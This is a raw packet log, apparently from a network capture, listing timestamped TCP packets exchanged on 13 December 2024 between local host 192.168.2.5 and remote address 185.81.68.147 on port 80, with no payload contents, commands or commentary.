                                                                                                                                                                Dec 13, 2024 01:37:12.993077040 CET4970780192.168.2.5185.81.68.147
                                                                                                                                                                Dec 13, 2024 01:37:12.993114948 CET8049707185.81.68.147192.168.2.5
                                                                                                                                                                Dec 13, 2024 01:37:12.993906975 CET8049707185.81.68.147192.168.2.5
                                                                                                                                                                Dec 13, 2024 01:37:12.993948936 CET4970780192.168.2.5185.81.68.147
                                                                                                                                                                Dec 13, 2024 01:37:12.994023085 CET8049707185.81.68.147192.168.2.5
                                                                                                                                                                Dec 13, 2024 01:37:12.994831085 CET8049707185.81.68.147192.168.2.5
                                                                                                                                                                Dec 13, 2024 01:37:12.994873047 CET4970780192.168.2.5185.81.68.147
                                                                                                                                                                Dec 13, 2024 01:37:12.994950056 CET8049707185.81.68.147192.168.2.5
                                                                                                                                                                Dec 13, 2024 01:37:12.995729923 CET8049707185.81.68.147192.168.2.5
                                                                                                                                                                Dec 13, 2024 01:37:12.995778084 CET4970780192.168.2.5185.81.68.147
                                                                                                                                                                Dec 13, 2024 01:37:12.995809078 CET8049707185.81.68.147192.168.2.5
                                                                                                                                                                Dec 13, 2024 01:37:12.996663094 CET8049707185.81.68.147192.168.2.5
                                                                                                                                                                Dec 13, 2024 01:37:12.996707916 CET8049707185.81.68.147192.168.2.5
                                                                                                                                                                Dec 13, 2024 01:37:12.996709108 CET4970780192.168.2.5185.81.68.147
                                                                                                                                                                Dec 13, 2024 01:37:12.997567892 CET8049707185.81.68.147192.168.2.5
                                                                                                                                                                Dec 13, 2024 01:37:12.997631073 CET4970780192.168.2.5185.81.68.147
                                                                                                                                                                Dec 13, 2024 01:37:12.997668028 CET8049707185.81.68.147192.168.2.5
                                                                                                                                                                Dec 13, 2024 01:37:12.998472929 CET8049707185.81.68.147192.168.2.5
                                                                                                                                                                Dec 13, 2024 01:37:12.998513937 CET4970780192.168.2.5185.81.68.147
                                                                                                                                                                Dec 13, 2024 01:37:12.998589039 CET8049707185.81.68.147192.168.2.5
                                                                                                                                                                Dec 13, 2024 01:37:12.999365091 CET8049707185.81.68.147192.168.2.5
                                                                                                                                                                Dec 13, 2024 01:37:12.999411106 CET4970780192.168.2.5185.81.68.147
                                                                                                                                                                Dec 13, 2024 01:37:12.999488115 CET8049707185.81.68.147192.168.2.5
                                                                                                                                                                Dec 13, 2024 01:37:13.000303984 CET8049707185.81.68.147192.168.2.5
                                                                                                                                                                Dec 13, 2024 01:37:13.000344038 CET4970780192.168.2.5185.81.68.147
                                                                                                                                                                Dec 13, 2024 01:37:13.000387907 CET8049707185.81.68.147192.168.2.5
                                                                                                                                                                Dec 13, 2024 01:37:13.001211882 CET8049707185.81.68.147192.168.2.5
                                                                                                                                                                Dec 13, 2024 01:37:13.001250982 CET4970780192.168.2.5185.81.68.147
                                                                                                                                                                Dec 13, 2024 01:37:13.001317024 CET8049707185.81.68.147192.168.2.5
                                                                                                                                                                Dec 13, 2024 01:37:13.002130985 CET8049707185.81.68.147192.168.2.5
                                                                                                                                                                Dec 13, 2024 01:37:13.002171040 CET4970780192.168.2.5185.81.68.147
                                                                                                                                                                Dec 13, 2024 01:37:13.002265930 CET8049707185.81.68.147192.168.2.5
                                                                                                                                                                Dec 13, 2024 01:37:13.003050089 CET8049707185.81.68.147192.168.2.5
                                                                                                                                                                Dec 13, 2024 01:37:13.003091097 CET4970780192.168.2.5185.81.68.147
                                                                                                                                                                Dec 13, 2024 01:37:13.003102064 CET8049707185.81.68.147192.168.2.5
                                                                                                                                                                Dec 13, 2024 01:37:13.003937960 CET8049707185.81.68.147192.168.2.5
                                                                                                                                                                Dec 13, 2024 01:37:13.003985882 CET4970780192.168.2.5185.81.68.147
                                                                                                                                                                Dec 13, 2024 01:37:13.004031897 CET8049707185.81.68.147192.168.2.5
                                                                                                                                                                Dec 13, 2024 01:37:13.004849911 CET8049707185.81.68.147192.168.2.5
                                                                                                                                                                Dec 13, 2024 01:37:13.004914999 CET4970780192.168.2.5185.81.68.147
                                                                                                                                                                Dec 13, 2024 01:37:13.004951954 CET8049707185.81.68.147192.168.2.5
                                                                                                                                                                Dec 13, 2024 01:37:13.005745888 CET8049707185.81.68.147192.168.2.5
                                                                                                                                                                Dec 13, 2024 01:37:13.005794048 CET4970780192.168.2.5185.81.68.147
                                                                                                                                                                Dec 13, 2024 01:37:13.005837917 CET8049707185.81.68.147192.168.2.5
                                                                                                                                                                Dec 13, 2024 01:37:13.006633997 CET8049707185.81.68.147192.168.2.5
                                                                                                                                                                Dec 13, 2024 01:37:13.006689072 CET4970780192.168.2.5185.81.68.147
                                                                                                                                                                Dec 13, 2024 01:37:13.006717920 CET8049707185.81.68.147192.168.2.5
                                                                                                                                                                Dec 13, 2024 01:37:13.007555008 CET8049707185.81.68.147192.168.2.5
                                                                                                                                                                Dec 13, 2024 01:37:13.007606030 CET4970780192.168.2.5185.81.68.147
                                                                                                                                                                Dec 13, 2024 01:37:13.007687092 CET8049707185.81.68.147192.168.2.5
                                                                                                                                                                Dec 13, 2024 01:37:13.008486032 CET8049707185.81.68.147192.168.2.5
                                                                                                                                                                Dec 13, 2024 01:37:13.008542061 CET4970780192.168.2.5185.81.68.147
                                                                                                                                                                Dec 13, 2024 01:37:13.008569956 CET8049707185.81.68.147192.168.2.5
                                                                                                                                                                Dec 13, 2024 01:37:13.009382963 CET8049707185.81.68.147192.168.2.5
                                                                                                                                                                Dec 13, 2024 01:37:13.009433985 CET4970780192.168.2.5185.81.68.147
                                                                                                                                                                Dec 13, 2024 01:37:13.009495020 CET8049707185.81.68.147192.168.2.5
                                                                                                                                                                Dec 13, 2024 01:37:13.010287046 CET8049707185.81.68.147192.168.2.5
                                                                                                                                                                Dec 13, 2024 01:37:13.010339022 CET4970780192.168.2.5185.81.68.147
                                                                                                                                                                Dec 13, 2024 01:37:13.010382891 CET8049707185.81.68.147192.168.2.5
                                                                                                                                                                Dec 13, 2024 01:37:13.011234045 CET8049707185.81.68.147192.168.2.5
                                                                                                                                                                Dec 13, 2024 01:37:13.011282921 CET4970780192.168.2.5185.81.68.147
                                                                                                                                                                Dec 13, 2024 01:37:13.011492968 CET8049707185.81.68.147192.168.2.5
                                                                                                                                                                Dec 13, 2024 01:37:13.012123108 CET8049707185.81.68.147192.168.2.5
                                                                                                                                                                Dec 13, 2024 01:37:13.012140036 CET8049707185.81.68.147192.168.2.5
                                                                                                                                                                Dec 13, 2024 01:37:13.012172937 CET4970780192.168.2.5185.81.68.147
                                                                                                                                                                Dec 13, 2024 01:37:13.013025999 CET8049707185.81.68.147192.168.2.5
                                                                                                                                                                Dec 13, 2024 01:37:13.013098955 CET4970780192.168.2.5185.81.68.147
                                                                                                                                                                Dec 13, 2024 01:37:13.013142109 CET8049707185.81.68.147192.168.2.5
                                                                                                                                                                Dec 13, 2024 01:37:13.013919115 CET8049707185.81.68.147192.168.2.5
                                                                                                                                                                Dec 13, 2024 01:37:13.013966084 CET4970780192.168.2.5185.81.68.147
                                                                                                                                                                Dec 13, 2024 01:37:13.014020920 CET8049707185.81.68.147192.168.2.5
                                                                                                                                                                Dec 13, 2024 01:37:13.014839888 CET8049707185.81.68.147192.168.2.5
                                                                                                                                                                Dec 13, 2024 01:37:13.014889956 CET4970780192.168.2.5185.81.68.147
                                                                                                                                                                Dec 13, 2024 01:37:13.014983892 CET8049707185.81.68.147192.168.2.5
                                                                                                                                                                Dec 13, 2024 01:37:13.015782118 CET8049707185.81.68.147192.168.2.5
                                                                                                                                                                Dec 13, 2024 01:37:13.015832901 CET4970780192.168.2.5185.81.68.147
                                                                                                                                                                Dec 13, 2024 01:37:13.015877008 CET8049707185.81.68.147192.168.2.5
                                                                                                                                                                Dec 13, 2024 01:37:13.016661882 CET8049707185.81.68.147192.168.2.5
                                                                                                                                                                Dec 13, 2024 01:37:13.016711950 CET4970780192.168.2.5185.81.68.147
                                                                                                                                                                Dec 13, 2024 01:37:13.016786098 CET8049707185.81.68.147192.168.2.5
                                                                                                                                                                Dec 13, 2024 01:37:13.017607927 CET8049707185.81.68.147192.168.2.5
                                                                                                                                                                Dec 13, 2024 01:37:13.017657995 CET4970780192.168.2.5185.81.68.147
                                                                                                                                                                Dec 13, 2024 01:37:13.017740965 CET8049707185.81.68.147192.168.2.5
                                                                                                                                                                Dec 13, 2024 01:37:13.018476963 CET8049707185.81.68.147192.168.2.5
                                                                                                                                                                Dec 13, 2024 01:37:13.018531084 CET4970780192.168.2.5185.81.68.147
                                                                                                                                                                Dec 13, 2024 01:37:13.018574953 CET8049707185.81.68.147192.168.2.5
                                                                                                                                                                Dec 13, 2024 01:37:13.019378901 CET8049707185.81.68.147192.168.2.5
                                                                                                                                                                Dec 13, 2024 01:37:13.019428968 CET4970780192.168.2.5185.81.68.147
                                                                                                                                                                Dec 13, 2024 01:37:13.019473076 CET8049707185.81.68.147192.168.2.5
                                                                                                                                                                Dec 13, 2024 01:37:13.020296097 CET8049707185.81.68.147192.168.2.5
                                                                                                                                                                Dec 13, 2024 01:37:13.020344019 CET4970780192.168.2.5185.81.68.147
                                                                                                                                                                Dec 13, 2024 01:37:13.020411015 CET8049707185.81.68.147192.168.2.5
                                                                                                                                                                Dec 13, 2024 01:37:13.021219969 CET8049707185.81.68.147192.168.2.5
                                                                                                                                                                Dec 13, 2024 01:37:13.021281958 CET4970780192.168.2.5185.81.68.147
                                                                                                                                                                Dec 13, 2024 01:37:13.021348000 CET8049707185.81.68.147192.168.2.5
                                                                                                                                                                Dec 13, 2024 01:37:13.022139072 CET8049707185.81.68.147192.168.2.5
                                                                                                                                                                Dec 13, 2024 01:37:13.022206068 CET4970780192.168.2.5185.81.68.147
                                                                                                                                                                Dec 13, 2024 01:37:13.022233963 CET8049707185.81.68.147192.168.2.5
                                                                                                                                                                Dec 13, 2024 01:37:13.023029089 CET8049707185.81.68.147192.168.2.5
                                                                                                                                                                Dec 13, 2024 01:37:13.023113012 CET4970780192.168.2.5185.81.68.147
                                                                                                                                                                Dec 13, 2024 01:37:13.023140907 CET8049707185.81.68.147192.168.2.5
                                                                                                                                                                Dec 13, 2024 01:37:13.023930073 CET8049707185.81.68.147192.168.2.5
                                                                                                                                                                Dec 13, 2024 01:37:13.023988008 CET4970780192.168.2.5185.81.68.147
                                                                                                                                                                Dec 13, 2024 01:37:13.024030924 CET8049707185.81.68.147192.168.2.5
                                                                                                                                                                Dec 13, 2024 01:37:13.024885893 CET8049707185.81.68.147192.168.2.5
                                                                                                                                                                Dec 13, 2024 01:37:13.024938107 CET4970780192.168.2.5185.81.68.147
                                                                                                                                                                Dec 13, 2024 01:37:13.024986982 CET8049707185.81.68.147192.168.2.5
                                                                                                                                                                Dec 13, 2024 01:37:13.025762081 CET8049707185.81.68.147192.168.2.5
                                                                                                                                                                Dec 13, 2024 01:37:13.025825024 CET4970780192.168.2.5185.81.68.147
                                                                                                                                                                Dec 13, 2024 01:37:13.025866985 CET8049707185.81.68.147192.168.2.5
                                                                                                                                                                Dec 13, 2024 01:37:13.026657104 CET8049707185.81.68.147192.168.2.5
                                                                                                                                                                Dec 13, 2024 01:37:13.026725054 CET4970780192.168.2.5185.81.68.147
                                                                                                                                                                Dec 13, 2024 01:37:13.026753902 CET8049707185.81.68.147192.168.2.5
                                                                                                                                                                Dec 13, 2024 01:37:13.027570009 CET8049707185.81.68.147192.168.2.5
                                                                                                                                                                Dec 13, 2024 01:37:13.027641058 CET4970780192.168.2.5185.81.68.147
                                                                                                                                                                Dec 13, 2024 01:37:13.027678967 CET8049707185.81.68.147192.168.2.5
                                                                                                                                                                Dec 13, 2024 01:37:13.028479099 CET8049707185.81.68.147192.168.2.5
                                                                                                                                                                Dec 13, 2024 01:37:13.028552055 CET4970780192.168.2.5185.81.68.147
                                                                                                                                                                Dec 13, 2024 01:37:13.028620005 CET8049707185.81.68.147192.168.2.5
                                                                                                                                                                Dec 13, 2024 01:37:13.029429913 CET8049707185.81.68.147192.168.2.5
                                                                                                                                                                Dec 13, 2024 01:37:13.029495955 CET4970780192.168.2.5185.81.68.147
                                                                                                                                                                Dec 13, 2024 01:37:13.029522896 CET8049707185.81.68.147192.168.2.5
                                                                                                                                                                Dec 13, 2024 01:37:13.030302048 CET8049707185.81.68.147192.168.2.5
                                                                                                                                                                Dec 13, 2024 01:37:13.030365944 CET4970780192.168.2.5185.81.68.147
                                                                                                                                                                Dec 13, 2024 01:37:13.030402899 CET8049707185.81.68.147192.168.2.5
                                                                                                                                                                Dec 13, 2024 01:37:13.031222105 CET8049707185.81.68.147192.168.2.5
                                                                                                                                                                Dec 13, 2024 01:37:13.031286001 CET4970780192.168.2.5185.81.68.147
                                                                                                                                                                Dec 13, 2024 01:37:13.031336069 CET8049707185.81.68.147192.168.2.5
                                                                                                                                                                Dec 13, 2024 01:37:13.032129049 CET8049707185.81.68.147192.168.2.5
                                                                                                                                                                Dec 13, 2024 01:37:13.032208920 CET4970780192.168.2.5185.81.68.147
                                                                                                                                                                Dec 13, 2024 01:37:13.032228947 CET8049707185.81.68.147192.168.2.5
                                                                                                                                                                Dec 13, 2024 01:37:13.033023119 CET8049707185.81.68.147192.168.2.5
                                                                                                                                                                Dec 13, 2024 01:37:13.033085108 CET4970780192.168.2.5185.81.68.147
                                                                                                                                                                Dec 13, 2024 01:37:13.033143997 CET8049707185.81.68.147192.168.2.5
                                                                                                                                                                Dec 13, 2024 01:37:13.033931971 CET8049707185.81.68.147192.168.2.5
                                                                                                                                                                Dec 13, 2024 01:37:13.033987045 CET4970780192.168.2.5185.81.68.147
                                                                                                                                                                Dec 13, 2024 01:37:13.034029007 CET8049707185.81.68.147192.168.2.5
                                                                                                                                                                Dec 13, 2024 01:37:13.034847975 CET8049707185.81.68.147192.168.2.5
                                                                                                                                                                Dec 13, 2024 01:37:13.034908056 CET4970780192.168.2.5185.81.68.147
                                                                                                                                                                Dec 13, 2024 01:37:13.034946918 CET8049707185.81.68.147192.168.2.5
                                                                                                                                                                Dec 13, 2024 01:37:13.082820892 CET4970780192.168.2.5185.81.68.147
                                                                                                                                                                Dec 13, 2024 01:37:13.180090904 CET8049707185.81.68.147192.168.2.5
                                                                                                                                                                Dec 13, 2024 01:37:13.180116892 CET8049707185.81.68.147192.168.2.5
                                                                                                                                                                Dec 13, 2024 01:37:13.180265903 CET4970780192.168.2.5185.81.68.147
                                                                                                                                                                Dec 13, 2024 01:37:13.180459023 CET8049707185.81.68.147192.168.2.5
                                                                                                                                                                Dec 13, 2024 01:37:13.180490971 CET8049707185.81.68.147192.168.2.5
                                                                                                                                                                Dec 13, 2024 01:37:13.180550098 CET4970780192.168.2.5185.81.68.147
                                                                                                                                                                Dec 13, 2024 01:37:13.181230068 CET8049707185.81.68.147192.168.2.5
                                                                                                                                                                Dec 13, 2024 01:37:13.181401968 CET8049707185.81.68.147192.168.2.5
                                                                                                                                                                Dec 13, 2024 01:37:13.181448936 CET4970780192.168.2.5185.81.68.147
                                                                                                                                                                Dec 13, 2024 01:37:13.182180882 CET8049707185.81.68.147192.168.2.5
                                                                                                                                                                Dec 13, 2024 01:37:13.182260990 CET8049707185.81.68.147192.168.2.5
                                                                                                                                                                Dec 13, 2024 01:37:13.182301998 CET4970780192.168.2.5185.81.68.147
                                                                                                                                                                Dec 13, 2024 01:37:13.183028936 CET8049707185.81.68.147192.168.2.5
                                                                                                                                                                Dec 13, 2024 01:37:13.183157921 CET8049707185.81.68.147192.168.2.5
                                                                                                                                                                Dec 13, 2024 01:37:13.183197975 CET4970780192.168.2.5185.81.68.147
                                                                                                                                                                Dec 13, 2024 01:37:13.184043884 CET8049707185.81.68.147192.168.2.5
                                                                                                                                                                Dec 13, 2024 01:37:13.184159040 CET8049707185.81.68.147192.168.2.5
                                                                                                                                                                Dec 13, 2024 01:37:13.184200048 CET4970780192.168.2.5185.81.68.147
                                                                                                                                                                Dec 13, 2024 01:37:13.184865952 CET8049707185.81.68.147192.168.2.5
                                                                                                                                                                Dec 13, 2024 01:37:13.185005903 CET8049707185.81.68.147192.168.2.5
                                                                                                                                                                Dec 13, 2024 01:37:13.185045958 CET4970780192.168.2.5185.81.68.147
                                                                                                                                                                Dec 13, 2024 01:37:13.185765028 CET8049707185.81.68.147192.168.2.5
                                                                                                                                                                Dec 13, 2024 01:37:13.185889959 CET8049707185.81.68.147192.168.2.5
                                                                                                                                                                Dec 13, 2024 01:37:13.185929060 CET4970780192.168.2.5185.81.68.147
                                                                                                                                                                Dec 13, 2024 01:37:13.186676979 CET8049707185.81.68.147192.168.2.5
                                                                                                                                                                Dec 13, 2024 01:37:13.186800957 CET8049707185.81.68.147192.168.2.5
                                                                                                                                                                Dec 13, 2024 01:37:13.186844110 CET4970780192.168.2.5185.81.68.147
                                                                                                                                                                Dec 13, 2024 01:37:13.187592983 CET8049707185.81.68.147192.168.2.5
                                                                                                                                                                Dec 13, 2024 01:37:13.187690973 CET8049707185.81.68.147192.168.2.5
                                                                                                                                                                Dec 13, 2024 01:37:13.187728882 CET4970780192.168.2.5185.81.68.147
                                                                                                                                                                Dec 13, 2024 01:37:13.188492060 CET8049707185.81.68.147192.168.2.5
                                                                                                                                                                Dec 13, 2024 01:37:13.188596964 CET8049707185.81.68.147192.168.2.5
                                                                                                                                                                Dec 13, 2024 01:37:13.188636065 CET4970780192.168.2.5185.81.68.147
                                                                                                                                                                Dec 13, 2024 01:37:13.189398050 CET8049707185.81.68.147192.168.2.5
                                                                                                                                                                Dec 13, 2024 01:37:13.189544916 CET8049707185.81.68.147192.168.2.5
                                                                                                                                                                Dec 13, 2024 01:37:13.189584017 CET4970780192.168.2.5185.81.68.147
                                                                                                                                                                Dec 13, 2024 01:37:13.190311909 CET8049707185.81.68.147192.168.2.5
                                                                                                                                                                Dec 13, 2024 01:37:13.190428019 CET8049707185.81.68.147192.168.2.5
                                                                                                                                                                Dec 13, 2024 01:37:13.190468073 CET4970780192.168.2.5185.81.68.147
                                                                                                                                                                Dec 13, 2024 01:37:13.191261053 CET8049707185.81.68.147192.168.2.5
                                                                                                                                                                Dec 13, 2024 01:37:13.191339970 CET8049707185.81.68.147192.168.2.5
                                                                                                                                                                Dec 13, 2024 01:37:13.191381931 CET4970780192.168.2.5185.81.68.147
                                                                                                                                                                Dec 13, 2024 01:37:13.192127943 CET8049707185.81.68.147192.168.2.5
                                                                                                                                                                Dec 13, 2024 01:37:13.192235947 CET8049707185.81.68.147192.168.2.5
                                                                                                                                                                Dec 13, 2024 01:37:13.192574024 CET4970780192.168.2.5185.81.68.147
                                                                                                                                                                Dec 13, 2024 01:37:13.193033934 CET8049707185.81.68.147192.168.2.5
                                                                                                                                                                Dec 13, 2024 01:37:13.193119049 CET8049707185.81.68.147192.168.2.5
                                                                                                                                                                Dec 13, 2024 01:37:13.193165064 CET4970780192.168.2.5185.81.68.147
                                                                                                                                                                Dec 13, 2024 01:37:13.193948984 CET8049707185.81.68.147192.168.2.5
                                                                                                                                                                Dec 13, 2024 01:37:13.194013119 CET8049707185.81.68.147192.168.2.5
                                                                                                                                                                Dec 13, 2024 01:37:13.194057941 CET4970780192.168.2.5185.81.68.147
                                                                                                                                                                Dec 13, 2024 01:37:13.194884062 CET8049707185.81.68.147192.168.2.5
                                                                                                                                                                Dec 13, 2024 01:37:13.195024967 CET8049707185.81.68.147192.168.2.5
                                                                                                                                                                Dec 13, 2024 01:37:13.195100069 CET4970780192.168.2.5185.81.68.147
                                                                                                                                                                Dec 13, 2024 01:37:13.195776939 CET8049707185.81.68.147192.168.2.5
                                                                                                                                                                Dec 13, 2024 01:37:13.195872068 CET8049707185.81.68.147192.168.2.5
                                                                                                                                                                Dec 13, 2024 01:37:13.195919037 CET4970780192.168.2.5185.81.68.147
                                                                                                                                                                Dec 13, 2024 01:37:13.196680069 CET8049707185.81.68.147192.168.2.5
                                                                                                                                                                Dec 13, 2024 01:37:13.196778059 CET8049707185.81.68.147192.168.2.5
                                                                                                                                                                Dec 13, 2024 01:37:13.196830988 CET4970780192.168.2.5185.81.68.147
                                                                                                                                                                Dec 13, 2024 01:37:13.197611094 CET8049707185.81.68.147192.168.2.5
                                                                                                                                                                Dec 13, 2024 01:37:13.197715044 CET8049707185.81.68.147192.168.2.5
                                                                                                                                                                Dec 13, 2024 01:37:13.197762966 CET4970780192.168.2.5185.81.68.147
                                                                                                                                                                Dec 13, 2024 01:37:13.198494911 CET8049707185.81.68.147192.168.2.5
                                                                                                                                                                Dec 13, 2024 01:37:13.198601961 CET8049707185.81.68.147192.168.2.5
                                                                                                                                                                Dec 13, 2024 01:37:13.198651075 CET4970780192.168.2.5185.81.68.147
                                                                                                                                                                Dec 13, 2024 01:37:13.199397087 CET8049707185.81.68.147192.168.2.5
                                                                                                                                                                Dec 13, 2024 01:37:13.199516058 CET8049707185.81.68.147192.168.2.5
                                                                                                                                                                Dec 13, 2024 01:37:13.199563026 CET4970780192.168.2.5185.81.68.147
                                                                                                                                                                Dec 13, 2024 01:37:13.200309992 CET8049707185.81.68.147192.168.2.5
                                                                                                                                                                Dec 13, 2024 01:37:13.200565100 CET8049707185.81.68.147192.168.2.5
                                                                                                                                                                Dec 13, 2024 01:37:13.200613022 CET4970780192.168.2.5185.81.68.147
                                                                                                                                                                Dec 13, 2024 01:37:13.201248884 CET8049707185.81.68.147192.168.2.5
                                                                                                                                                                Dec 13, 2024 01:37:13.201343060 CET8049707185.81.68.147192.168.2.5
                                                                                                                                                                Dec 13, 2024 01:37:13.201405048 CET4970780192.168.2.5185.81.68.147
                                                                                                                                                                Dec 13, 2024 01:37:13.202125072 CET8049707185.81.68.147192.168.2.5
                                                                                                                                                                Dec 13, 2024 01:37:13.202240944 CET8049707185.81.68.147192.168.2.5
                                                                                                                                                                Dec 13, 2024 01:37:13.202290058 CET4970780192.168.2.5185.81.68.147
                                                                                                                                                                Dec 13, 2024 01:37:13.203042984 CET8049707185.81.68.147192.168.2.5
                                                                                                                                                                Dec 13, 2024 01:37:13.203136921 CET8049707185.81.68.147192.168.2.5
                                                                                                                                                                Dec 13, 2024 01:37:13.203208923 CET4970780192.168.2.5185.81.68.147
                                                                                                                                                                Dec 13, 2024 01:37:13.203968048 CET8049707185.81.68.147192.168.2.5
                                                                                                                                                                Dec 13, 2024 01:37:13.204021931 CET8049707185.81.68.147192.168.2.5
                                                                                                                                                                Dec 13, 2024 01:37:13.204061985 CET4970780192.168.2.5185.81.68.147
                                                                                                                                                                Dec 13, 2024 01:37:13.204855919 CET8049707185.81.68.147192.168.2.5
                                                                                                                                                                Dec 13, 2024 01:37:13.204977989 CET8049707185.81.68.147192.168.2.5
                                                                                                                                                                Dec 13, 2024 01:37:13.205019951 CET4970780192.168.2.5185.81.68.147
                                                                                                                                                                Dec 13, 2024 01:37:13.205761909 CET8049707185.81.68.147192.168.2.5
                                                                                                                                                                Dec 13, 2024 01:37:13.205883026 CET8049707185.81.68.147192.168.2.5
                                                                                                                                                                Dec 13, 2024 01:37:13.205935001 CET4970780192.168.2.5185.81.68.147
                                                                                                                                                                Dec 13, 2024 01:37:13.206249952 CET4970780192.168.2.5185.81.68.147
                                                                                                                                                                Dec 13, 2024 01:37:13.206691027 CET8049707185.81.68.147192.168.2.5
                                                                                                                                                                Dec 13, 2024 01:37:13.206796885 CET8049707185.81.68.147192.168.2.5
                                                                                                                                                                Dec 13, 2024 01:37:13.206861019 CET4970780192.168.2.5185.81.68.147
                                                                                                                                                                Dec 13, 2024 01:37:13.207582951 CET8049707185.81.68.147192.168.2.5
                                                                                                                                                                Dec 13, 2024 01:37:13.207695007 CET8049707185.81.68.147192.168.2.5
                                                                                                                                                                Dec 13, 2024 01:37:13.207748890 CET4970780192.168.2.5185.81.68.147
                                                                                                                                                                Dec 13, 2024 01:37:13.208504915 CET8049707185.81.68.147192.168.2.5
                                                                                                                                                                Dec 13, 2024 01:37:13.208633900 CET8049707185.81.68.147192.168.2.5
                                                                                                                                                                Dec 13, 2024 01:37:13.208673000 CET4970780192.168.2.5185.81.68.147
                                                                                                                                                                Dec 13, 2024 01:37:13.209412098 CET8049707185.81.68.147192.168.2.5
                                                                                                                                                                Dec 13, 2024 01:37:13.209537983 CET8049707185.81.68.147192.168.2.5
                                                                                                                                                                Dec 13, 2024 01:37:13.209580898 CET4970780192.168.2.5185.81.68.147
                                                                                                                                                                Dec 13, 2024 01:37:13.210311890 CET8049707185.81.68.147192.168.2.5
                                                                                                                                                                Dec 13, 2024 01:37:13.210484982 CET8049707185.81.68.147192.168.2.5
                                                                                                                                                                Dec 13, 2024 01:37:13.210551977 CET4970780192.168.2.5185.81.68.147
                                                                                                                                                                Dec 13, 2024 01:37:13.211236000 CET8049707185.81.68.147192.168.2.5
                                                                                                                                                                Dec 13, 2024 01:37:13.211417913 CET8049707185.81.68.147192.168.2.5
                                                                                                                                                                Dec 13, 2024 01:37:13.211474895 CET4970780192.168.2.5185.81.68.147
                                                                                                                                                                Dec 13, 2024 01:37:13.212143898 CET8049707185.81.68.147192.168.2.5
                                                                                                                                                                Dec 13, 2024 01:37:13.212264061 CET8049707185.81.68.147192.168.2.5
                                                                                                                                                                Dec 13, 2024 01:37:13.212306023 CET4970780192.168.2.5185.81.68.147
                                                                                                                                                                Dec 13, 2024 01:37:13.213037014 CET8049707185.81.68.147192.168.2.5
                                                                                                                                                                Dec 13, 2024 01:37:13.213150978 CET8049707185.81.68.147192.168.2.5
                                                                                                                                                                Dec 13, 2024 01:37:13.213191986 CET4970780192.168.2.5185.81.68.147
                                                                                                                                                                Dec 13, 2024 01:37:13.213956118 CET8049707185.81.68.147192.168.2.5
                                                                                                                                                                Dec 13, 2024 01:37:13.214071035 CET8049707185.81.68.147192.168.2.5
                                                                                                                                                                Dec 13, 2024 01:37:13.214118004 CET4970780192.168.2.5185.81.68.147
                                                                                                                                                                Dec 13, 2024 01:37:13.214854002 CET8049707185.81.68.147192.168.2.5
                                                                                                                                                                Dec 13, 2024 01:37:13.214963913 CET8049707185.81.68.147192.168.2.5
                                                                                                                                                                Dec 13, 2024 01:37:13.215008974 CET4970780192.168.2.5185.81.68.147
                                                                                                                                                                Dec 13, 2024 01:37:13.215785027 CET8049707185.81.68.147192.168.2.5
                                                                                                                                                                Dec 13, 2024 01:37:13.215981960 CET8049707185.81.68.147192.168.2.5
                                                                                                                                                                Dec 13, 2024 01:37:13.216025114 CET4970780192.168.2.5185.81.68.147
                                                                                                                                                                Dec 13, 2024 01:37:13.216710091 CET8049707185.81.68.147192.168.2.5
                                                                                                                                                                Dec 13, 2024 01:37:13.216814995 CET8049707185.81.68.147192.168.2.5
                                                                                                                                                                Dec 13, 2024 01:37:13.216860056 CET4970780192.168.2.5185.81.68.147
                                                                                                                                                                Dec 13, 2024 01:37:13.217593908 CET8049707185.81.68.147192.168.2.5
                                                                                                                                                                Dec 13, 2024 01:37:13.217664957 CET8049707185.81.68.147192.168.2.5
                                                                                                                                                                Dec 13, 2024 01:37:13.217710972 CET4970780192.168.2.5185.81.68.147
                                                                                                                                                                Dec 13, 2024 01:37:13.218506098 CET8049707185.81.68.147192.168.2.5
                                                                                                                                                                Dec 13, 2024 01:37:13.218600988 CET8049707185.81.68.147192.168.2.5
                                                                                                                                                                Dec 13, 2024 01:37:13.218645096 CET4970780192.168.2.5185.81.68.147
                                                                                                                                                                Dec 13, 2024 01:37:13.219470978 CET8049707185.81.68.147192.168.2.5
                                                                                                                                                                Dec 13, 2024 01:37:13.219552994 CET8049707185.81.68.147192.168.2.5
                                                                                                                                                                Dec 13, 2024 01:37:13.219593048 CET4970780192.168.2.5185.81.68.147
                                                                                                                                                                Dec 13, 2024 01:37:13.220318079 CET8049707185.81.68.147192.168.2.5
                                                                                                                                                                Dec 13, 2024 01:37:13.220386028 CET8049707185.81.68.147192.168.2.5
                                                                                                                                                                Dec 13, 2024 01:37:13.220423937 CET4970780192.168.2.5185.81.68.147
                                                                                                                                                                Dec 13, 2024 01:37:13.221282959 CET8049707185.81.68.147192.168.2.5
                                                                                                                                                                Dec 13, 2024 01:37:13.221405029 CET8049707185.81.68.147192.168.2.5
                                                                                                                                                                Dec 13, 2024 01:37:13.221446037 CET4970780192.168.2.5185.81.68.147
                                                                                                                                                                Dec 13, 2024 01:37:13.222147942 CET8049707185.81.68.147192.168.2.5
                                                                                                                                                                Dec 13, 2024 01:37:13.222249985 CET8049707185.81.68.147192.168.2.5
                                                                                                                                                                Dec 13, 2024 01:37:13.222289085 CET4970780192.168.2.5185.81.68.147
                                                                                                                                                                Dec 13, 2024 01:37:13.223078012 CET8049707185.81.68.147192.168.2.5
                                                                                                                                                                Dec 13, 2024 01:37:13.223171949 CET8049707185.81.68.147192.168.2.5
                                                                                                                                                                Dec 13, 2024 01:37:13.223215103 CET4970780192.168.2.5185.81.68.147
                                                                                                                                                                Dec 13, 2024 01:37:13.223963976 CET8049707185.81.68.147192.168.2.5
                                                                                                                                                                Dec 13, 2024 01:37:13.224045992 CET8049707185.81.68.147192.168.2.5
                                                                                                                                                                Dec 13, 2024 01:37:13.224091053 CET4970780192.168.2.5185.81.68.147
                                                                                                                                                                Dec 13, 2024 01:37:13.224878073 CET8049707185.81.68.147192.168.2.5
                                                                                                                                                                Dec 13, 2024 01:37:13.224976063 CET8049707185.81.68.147192.168.2.5
                                                                                                                                                                Dec 13, 2024 01:37:13.225023031 CET4970780192.168.2.5185.81.68.147
                                                                                                                                                                Dec 13, 2024 01:37:13.225792885 CET8049707185.81.68.147192.168.2.5
                                                                                                                                                                Dec 13, 2024 01:37:13.225904942 CET8049707185.81.68.147192.168.2.5
                                                                                                                                                                Dec 13, 2024 01:37:13.225964069 CET4970780192.168.2.5185.81.68.147
                                                                                                                                                                Dec 13, 2024 01:37:13.226692915 CET8049707185.81.68.147192.168.2.5
                                                                                                                                                                Dec 13, 2024 01:37:13.226805925 CET8049707185.81.68.147192.168.2.5
